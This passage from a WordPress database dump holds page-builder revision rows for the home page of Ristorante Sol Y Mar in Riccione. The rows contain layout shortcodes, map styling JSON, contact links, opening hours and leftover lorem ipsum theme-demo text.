``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Richieste\" content_padding=\"124px 0\" email=\"info@ristorantesolymar.it\" link=\"mailto:info@ristorantesolymar.it\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"events@attika.ny\" link=\"mailto:events@attika.ny\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2021-01-20 18:37:11','2021-01-20 17:37:11','',3040,'https://www.ristorantesolymar.it/2021/01/20/3040-revision-v1/',0,'revision','',0),(3974,1,'2021-01-20 18:32:16','2021-01-20 17:32:16','<p>[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.</p>\r\n<p>Mauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.<br />\r\nCucina di Pesce, proposte vegetariane<br />\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]</p>\r\n<div dir=\"auto\">e proposte vegetariane</div>\r\n<p>[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday<br />\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday<br />\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]</p>\r\n<h3>Ristorante Sol Y Mar</h3>\r\n<p>[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio<br />\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`<br />\r\n{<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#f5f5f5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.icon``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``visibility``: ``off``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#616161``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.text.stroke``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#f5f5f5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``administrative.land_parcel``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#bdbdbd``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#eeeeee``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#757575``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi.park``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#e5e5e5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi.park``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#ffffff``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.arterial``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#757575``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.highway``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#dadada``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.highway``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#616161``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.local``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``transit.line``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#e5e5e5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``transit.station``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#eeeeee``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``water``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#c9c9c9``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``water``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n}<br />\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"events@attika.ny\" link=\"mailto:events@attika.ny\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]</p>\r\n','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2021-01-20 18:32:16','2021-01-20 17:32:16','',3040,'https://www.ristorantesolymar.it/2021/01/20/3040-revision-v1/',0,'revision','',0),(3041,1,'2018-07-30 15:00:18','2018-07-30 15:00:18','[vc_row el_class=\"home-two-first-row\"][vc_column offset=\"vc_col-lg-2 vc_col-md-2 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"97% 0 0 0\" item_padding_681_768=\"7% 0% 0 11%\" item_padding_680=\"13% 0% 16% 8%\"][mkdf_menu_popup number_of_columns=\"one\" column_one_category=\"appetizers\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-8 vc_col-md-8 vc_col-xs-12\" css=\".vc_custom_1535985514307{padding-right: 0px !important;padding-left: 0px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 3% 0 3%\" item_padding_1367_1600=\"0 0 0 0\" item_padding_1025_1366=\"0 0 0 0\"][rev_slider_vc alias=\"restaurant-home\" enable_paspartu=\"no\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-2 vc_col-md-2 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"97% 0% 0 59%\" item_padding_681_768=\"0% 12% 0 0%\" item_padding_680=\"17% 15% 0 0%\" item_padding_1025_1366=\"97% 0% 0 40%\" item_padding_1367_1600=\"97% 0% 0 43%\"][mkdf_reservation_popup open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row el_class=\"home-two-second-row\"][vc_column width=\"1/2\" offset=\"vc_col-lg-2 vc_col-md-6 vc_col-xs-6\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_769_1024=\"80px 0% 60px 12%\" item_padding_681_768=\"52px 0% 58px 6%\" item_padding_680=\"52px 0 59px 7%\"][mkdf_menu_popup number_of_columns=\"one\" column_one_category=\"appetizers\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"2/3\" offset=\"vc_col-lg-8 vc_col-md-8 vc_hidden-md vc_hidden-sm vc_col-xs-12 vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-2 vc_col-md-6 vc_col-xs-6\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"80px 12% 60px 0%\" item_padding_681_768=\"52px 6% 58px 0\" item_padding_680=\"52px 7% 59px 0\"][mkdf_reservation_popup open_table_id=\"98\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row el_class=\"home-two-third-row\"][vc_column offset=\"vc_col-lg-2 vc_col-md-12 vc_col-xs-12\"][/vc_column][vc_column offset=\"vc_col-lg-8 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 3% 0 3%\"][rev_slider_vc alias=\"restaurant-home\" enable_paspartu=\"no\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-2 vc_col-md-12 vc_col-xs-12\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1535460622871{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_column css=\".vc_custom_1535461280310{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-4 vc_col-md-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"65% 20% 0 2%\" item_padding_1367_1600=\"65% 0 0 0\" item_padding_1025_1366=\"65% 4% 0 25%\" item_padding_769_1024=\"15% 2% 0\" item_padding_681_768=\"18% 2% 0\" item_padding_680=\"30% 5% 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Daily menu &amp; drinks\" text=\"Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus sed odio sit amet a sit natoque penatibus.\" line_length=\"0px\" text_margin=\"23\"]Lorem ipsum proin gravida velit auctor aliquet. Aenean sollicitu din, lorem auci elit consequat enim justo niuis sed odio sit ameta sit amet.[/mkdf_section_title][vc_empty_space height=\"48px\"][mkdf_button type=\"simple\" text=\"See full menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][vc_empty_space height=\"100px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-7 vc_col-md-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\" background_color=\"#faf5f0\" custom_class=\"mkdf-reveal-from-top\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"95px 0 140px\" item_padding_1367_1600=\"95px 0 140px\" item_padding_1025_1366=\"95px 0 140px\" item_padding_769_1024=\"95px 0 140px\" item_padding_681_768=\"95px 0 140px\" item_padding_680=\"95px 0 200px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Drink\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533043384159{padding-top: 4px !important;}\"]Matcha latte\nWhite wine[/vc_column_text][vc_empty_space 